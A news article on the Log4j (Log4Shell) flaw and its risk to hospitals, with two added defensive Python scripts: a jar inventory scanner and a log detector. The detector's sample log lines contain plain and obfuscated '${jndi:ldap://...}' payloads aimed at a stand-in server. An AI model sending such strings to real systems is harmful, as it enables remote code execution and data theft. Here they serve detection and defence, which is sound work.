Hospital and health system executives should assess the software they're using and monitor their networks as businesses across the U.S. grapple with a recently discovered cybersecurity vulnerability found in enterprise applications and cloud services, experts say.
"What makes this vulnerability so dangerous is the fact that it is ubiquitous," said John Riggi, senior adviser for cybersecurity and risk at the American Hospital Association, of the Log4j vulnerability. "It's third-party software that's embedded in other devices or programs, which has widespread use across all sectors—including healthcare."
The flaw is in a widely used open-source component known as Log4j, a logging framework that records events inside an application, often for performance and security troubleshooting. It is a library for Java, a popular programming language that underpins many software programs, and it is bundled inside the applications that use it rather than installed separately, which is why it is so hard to find.
Attackers can exploit the flaw by slipping a specially crafted string into any input the application logs, such as a web request header; vulnerable Log4j versions treat that string as a lookup instruction and fetch and run code from a server the attacker controls, with no authentication required. From there, an attacker could exfiltrate patient data or deploy ransomware.
The vulnerability is already being "widely exploited by a growing set of threat actors," said Jen Easterly, director of the Homeland Security Department's Cybersecurity and Infrastructure Security Agency, in a statement posted online this weekend. "To be clear, this vulnerability poses a severe risk."
CISA is working with public- and private-sector partners, including the Federal Bureau of Investigation and the National Security Agency.
The Apache Software Foundation, the volunteer-run not-for-profit that develops the software, has released updated Log4j versions that address the vulnerability. Organizations that run Log4j directly in applications they build themselves can update it on their own.
But most organizations using software with the vulnerability will have to rely on vendors to identify and patch their products, Easterly said. She said organizations should identify all external-facing devices that have Log4j installed and ensure their security team updates those devices as vendors make fixes available.
She urged vendors to inform customers about whether products contain the Log4j vulnerability.
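The first step Easterly describes, finding out where Log4j actually is, is harder than it sounds because the library is usually buried inside application archives rather than installed on its own. The script below is an added example written for this article (it is not code from the article, the AHA, CISA or the Apache project) showing how an inventory can be built: it walks a directory tree, opens every .jar/.war/.ear/.zip, looks for the Maven metadata that log4j-core ships with and for JndiLookup.class (the class that performs the lookup the exploit abuses), and recurses into archives nested inside archives. The sample deployment tree it scans is constructed inside the script; the fixed version it compares against is a placeholder and should be taken from the Apache advisory for the CVE being tracked, and the archive suffixes and nesting limit are assumptions.

```python
"""Find copies of Log4j 2 on a host, including copies nested inside application
archives (a .jar inside a .war inside an .ear).  Added example; assumptions are noted inline."""
import io
import os
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")   # assumption: what counts as an archive
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

@dataclass(frozen=True)
class Finding:
    path: str                # outer file; "!/" separates nested archive entries
    version: Optional[str]   # from pom.properties, None when no metadata survived
    jndi_lookup_present: bool

def _version_from_pom(data: bytes) -> Optional[str]:
    for raw in data.decode("utf-8", "replace").splitlines():
        if raw.strip().startswith("version="):
            return raw.strip().split("=", 1)[1].strip()
    return None

def _version_tuple(version: str) -> Tuple[int, ...]:
    # "2.14.1" -> (2, 14, 1); non-numeric suffixes such as "-rc1" are dropped
    return tuple(int("".join(c for c in p if c.isdigit()) or 0) for p in version.split("."))

def is_below(version: str, fixed: str) -> bool:
    return _version_tuple(version) < _version_tuple(fixed)

def _scan_archive(name: str, data: bytes, depth: int = 0) -> Iterator[Finding]:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # a .jar that is not a zip container: corrupt, or misnamed
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP_CLASS in names
        version = _version_from_pom(zf.read(POM_PROPERTIES)) if POM_PROPERTIES in names else None
        if has_jndi or version is not None:
            yield Finding(name, version, has_jndi)
        if depth >= 5:  # assumption: guard against pathological nesting
            return
        for entry in names:
            if entry.lower().endswith(ARCHIVE_SUFFIXES):
                yield from _scan_archive(f"{name}!/{entry}", zf.read(entry), depth + 1)

def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(_scan_archive(full, fh.read()))
    return findings

def needs_action(f: Finding, fixed_version: str) -> bool:
    """Below the fixed version, or JndiLookup present with no version metadata (a shaded copy)."""
    return f.jndi_lookup_present if f.version is None else is_below(f.version, fixed_version)

def _make_jar(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def build_sample_tree(root: str) -> None:
    """Constructed deployment tree for this example: a vulnerable log4j-core, a patched
    copy nested inside a .war, and a shaded copy with no metadata.  The .class entries
    are stand-ins (just the class-file magic bytes)."""
    lib, webapps = os.path.join(root, "app", "lib"), os.path.join(root, "app", "webapps")
    for d in (lib, webapps):
        os.makedirs(d)
    cls = b"\xca\xfe\xba\xbe"
    pom = lambda v: f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={v}\n".encode()
    jars = {
        os.path.join(lib, "log4j-core-2.14.1.jar"): {JNDI_LOOKUP_CLASS: cls, POM_PROPERTIES: pom("2.14.1")},
        os.path.join(lib, "vendor-shaded.jar"): {JNDI_LOOKUP_CLASS: cls, "com/vendor/App.class": cls},
        os.path.join(webapps, "portal.war"): {
            "WEB-INF/web.xml": b"<web-app/>",
            "WEB-INF/lib/log4j-core-2.17.1.jar": _make_jar({JNDI_LOOKUP_CLASS: cls, POM_PROPERTIES: pom("2.17.1")}),
        },
    }
    for path, entries in jars.items():
        with open(path, "wb") as fh:
            fh.write(_make_jar(entries))

def demo(fixed_version: str = "2.17.1") -> List[Tuple[str, Optional[str], bool, bool]]:
    """Scan the sample tree; rows are (relative path, version, JndiLookup present, needs action).
    The default fixed version is a placeholder: take the real one from the Apache advisory."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        rows = [(os.path.relpath(f.path, root).replace(os.sep, "/"), f.version,
                 f.jndi_lookup_present, needs_action(f, fixed_version)) for f in scan_tree(root)]
    return sorted(rows)

if __name__ == "__main__":
    for path, version, jndi, action in demo():
        print("ACTION" if action else "ok    ", path, "version=" + str(version), "JndiLookup=" + str(jndi))
```

Point `scan_tree` at a real root (for example an application server's installation directory) instead of the constructed tree to inventory a host. Two design choices matter in practice: a copy with no version metadata but with JndiLookup.class present is reported as needing action rather than silently skipped, because shaded and repackaged copies are exactly the ones vendors forget to mention; and only the class that performs the lookup is used as the marker, so an application whose vendor already removed that class from the jar is not flagged by it.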
The Log4j logging framework has been used for years, said Bryan Orme, a principal at cybersecurity consulting firm GuidePoint Security.
"A lot of modern application architectures have been built on top of it," Orme said.
The vulnerability has affected many cloud companies.
Amazon Web Services, Amazon's cloud arm, released a list of services affected by the vulnerability and whether they've been updated. IBM said it's "actively responding" to the vulnerability, investigating products and services that could be exploited and sharing a running list of products it determines aren't affected by the bug.
VMware has said the vulnerability affects multiple products for which it's working on patches.
This scenario is an example of why the AHA has pressed the federal government to require medical devicemakers to disclose a "software bill of materials" for their products, Riggi said.
The Food and Drug Administration in 2018 released a draft of pre-market guidance for managing cybersecurity in medical devices, which included asking developers of internet-connected medical devices to provide customers with a bill of materials, or rundown of commercial and off-the-shelf technologies in the device. That could help customers assess whether a product is susceptible to vulnerabilities.
The FDA hasn't released final guidance.
"One of the biggest challenges we have is just trying to understand what devices and what technologies incorporate this software," Riggi said. "Hospitals and health systems right now are scrambling to identify how they might be exposed to this vulnerability and are making tremendous efforts to patch."
"Of course, that can be quite the distraction for our hospitals and health systems right now, especially as they're facing a surge of COVID-19 and flu patients," he added.
Even after applications are patched and updated, it's important to monitor the network for unexpected activity, in case the organization's environment has already been compromised, said Mac McMillan, CEO of cybersecurity consulting firm CynergisTek. The Log4j vulnerability was disclosed late last week, but hackers had reportedly been trying to exploit it since earlier in December, he said.
"There's a period of time there where somebody could have taken advantage of this vulnerability … and infiltrated [an organization's] system without them knowing it," McMillan said.
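McMillan's point is that patching closes the door but says nothing about who already walked through it, so the logs from before the patch need to be checked for exploitation attempts. The script below is an added example written for this article (not code from the article, CynergisTek or any vendor) showing what that check looks like over web-server log lines. Vulnerable Log4j versions expand "${...}" lookups found in logged text, and the exploit plants a "${jndi:...}" lookup in any client-controlled field that gets logged; because attackers hide the "jndi" token behind nested lookups such as "${lower:j}" and "${::-j}" and behind URL encoding, a plain search for "${jndi:" misses much of the traffic, so the script collapses those lookups the way Log4j would before matching. The log lines are constructed for this example and the addresses come from documentation and private ranges; the lookup forms modelled are the ones commonly seen in obfuscated payloads, not the full Log4j lookup syntax.

```python
"""Spot Log4Shell-style lookup strings in application or web-server log lines.
Added example; the sample lines at the bottom are constructed, not real traffic."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

_INNER = re.compile(r"\$\{([^${}]*)\}")          # a lookup with nothing nested inside it
_JNDI = re.compile(r"\$\{\s*jndi:([^}]*)\}", re.IGNORECASE)
_MAX_PASSES = 20                                 # bound the work spent per line

def _resolve_inner(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way attackers rely on Log4j doing it.
    Only the forms used for obfuscation are modelled (assumption); anything
    else is left in place, which is also what Log4j does with an unknown lookup."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)            # keep: this is the thing we are hunting
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${anything:-default} -> default
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    return match.group(0)

def normalize(text: str) -> str:
    """URL-decode (twice, for double-encoded payloads) and collapse nested lookups
    from the inside out until nothing changes or only jndi lookups remain."""
    text = unquote(unquote(text))
    for _ in range(_MAX_PASSES):
        collapsed = _INNER.sub(_resolve_inner, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def classify(line: str) -> Tuple[str, Optional[str]]:
    """'jndi' with the lookup target, 'lookup' for any other ${...} arriving from
    outside (lookups have no business in client-supplied data), or 'clean'."""
    norm = normalize(line)
    hit = _JNDI.search(norm)
    if hit:
        return "jndi", hit.group(1)
    if "${" in norm:
        return "lookup", None
    return "clean", None

def scan_log(lines: List[str]) -> List[Tuple[int, str, Optional[str]]]:
    """Return (line number, verdict, target) for every line that is not clean."""
    out = []
    for number, line in enumerate(lines, start=1):
        verdict, target = classify(line)
        if verdict != "clean":
            out.append((number, verdict, target))
    return out

# Constructed access-log lines (Combined Log Format) for this example only.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 1043 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:13 +0000] "GET /${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7:1389/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:14:02:14 +0000] "GET /search?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 200 88 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:14:02:15 +0000] "GET /?x=${env:HOME} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, verdict, target in scan_log(SAMPLE_LINES):
        print(f"line {number}: {verdict}  target={target}")
```

A hit in the logs shows an attempt, not a successful compromise; the follow-up is to check whether the application host made an outbound LDAP, RMI or HTTP connection to the target address around that timestamp, which is the step McMillan's "infiltrated ... without them knowing it" warning is about. Any "lookup" verdict deserves a look as well, since a "${" sequence in client-supplied data is almost never legitimate.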